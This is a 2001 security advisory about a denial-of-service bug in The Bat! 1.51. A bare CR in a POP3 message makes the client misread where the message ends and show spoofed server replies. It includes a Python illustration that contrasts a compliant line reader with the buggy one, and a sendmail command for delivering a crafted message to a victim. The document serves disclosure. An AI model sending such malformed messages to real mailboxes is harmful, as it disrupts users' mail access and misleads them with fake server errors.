 
From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Wed Apr 18 2001 - 08:04:56 CDT


    There is more fun than security impact in this issue, but it's a kind
    of DoS and can give a lot of headache to postmasters.

    =-------8<----------------------------------

    SECURITY.NNOV URL: http://www.security.nnov.ru
    Topic: The Bat! <cr> bug
    Application: The Bat! 1.51 (latest)
    Vendor: RitLabs
    Category: Denial of Service
    Risk Factor: Low
    Remote: Yes
    Vendor Contacted: 13.04.2001
    Software URL: http://www.thebat.net
    Vendor URL: http://www.ritlabs.com

    +Introduction:

     The Bat! is a very convenient, commercially available MUA for Windows
     with a lot of features.

    +Details:

     While retrieving a message via POP3 RETR (IMAP isn't tested), The Bat!
     incorrectly processes the 0x0D (CR) character if it's not followed by
     0x0A (LF). The Bat! incorrectly calculates the end of the message, and
     part of the message is treated as a reply from the POP3 server. The Bat!
     fails to receive the rest of the messages and fails to delete received
     messages from the server. This leads to a DoS against the user's POP3
     account. A malformed message can emulate any POP3 server reply.
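     As an added illustration (not part of the advisory or of The Bat!), a
     minimal RFC 1939 RETR reader that only ends a line on CRLF, beside a
     variant that accepts a bare CR as a line end, both run over a constructed
     response; the sample bytes are constructed here and are not the advisory's
     attached "badmessage".

```python
# Constructed RETR exchange: a message body containing a bare CR followed by
# text shaped like a POP3 error reply, then the real CRLF.CRLF terminator,
# then the server's next genuine reply. Byte-stuffed ".." line included too.
SAMPLE_RETR_RESPONSE = (
    b"+OK message follows\r\n"
    b"From: sender@example.test\r\n"
    b"Subject: test\r\n"
    b"\r\n"
    b"body line one\r"            # bare CR: not a line terminator per RFC 1939
    b".\r-ERR Wrong User\r\n"     # still body text for a compliant client
    b"..leading dot (stuffed)\r\n"
    b".\r\n"                      # real end of the multi-line response
    b"+OK 1 messages\r\n"         # next genuine server reply
)


def read_crlf_line(buf, pos):
    """Compliant reader: only CRLF ends a line; a bare CR stays inside it."""
    end = buf.find(b"\r\n", pos)
    if end < 0:
        raise ValueError("incomplete line")
    return buf[pos:end], end + 2


def read_cr_line(buf, pos):
    """Buggy reader (the behaviour the advisory describes): CR ends a line
    whether or not an LF follows it."""
    end = buf.find(b"\r", pos)
    if end < 0:
        raise ValueError("incomplete line")
    new_pos = end + 1
    if buf[new_pos:new_pos + 1] == b"\n":
        new_pos += 1
    return buf[pos:end], new_pos


def parse_retr(buf, read_line):
    """Parse one RETR response. Returns (status, body, unread_bytes); body is
    None when the status line is not +OK. Lines starting with '.' are
    dot-unstuffed and a lone '.' line terminates the response."""
    status, pos = read_line(buf, 0)
    if not status.startswith(b"+OK"):
        return status, None, buf[pos:]
    lines = []
    while True:
        line, pos = read_line(buf, pos)
        if line == b".":
            break
        lines.append(line[1:] if line.startswith(b".") else line)
    return status, b"\r\n".join(lines) + b"\r\n", buf[pos:]
```

     With the compliant reader the fake "-ERR" text stays in the body and the
     next reply the client sees is "+OK 1 messages"; with the CR reader the
     message ends early and the leftover bytes start with "-ERR".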

    +Exploitation:

     Extract the attached "badmessage" and send it, e.g. using

       cat badmessage | sendmail -U victimsomewhere.net

     or copy it to the user's mailbox.
     This message causes The Bat! to show something like:

       !13.04.2001, 17:51:01: FETCH - Server reports error. The response is: --ERR Wrong User: replace user with your system administrator--

     The message is crafted so that this text does not appear anywhere in its body.

    +Workaround:

     Use the "Dispatch Mail on Server" feature to delete the malformed message
     from the server, or use a different MUA.

    +Solution:

     None yet.

    +Vendor:

     RitLabs was contacted on April 13 (happy Easter to you, guys). No
     feedback yet.

    This advisory is being provided to you under RFPolicy v.2 documented
    at http://www.wiretrip.net/rfp/policy.html.

    --
    http://www.security.nnov.ru
             /\_/\
            { . . }     |\
    +--oQQo->{ ^ }<-----+ \
    |  3APA3A  U  3APA3A   }
    +-------------o66o--+ /
                        |/
    You know my name - look up my number (The Beatles)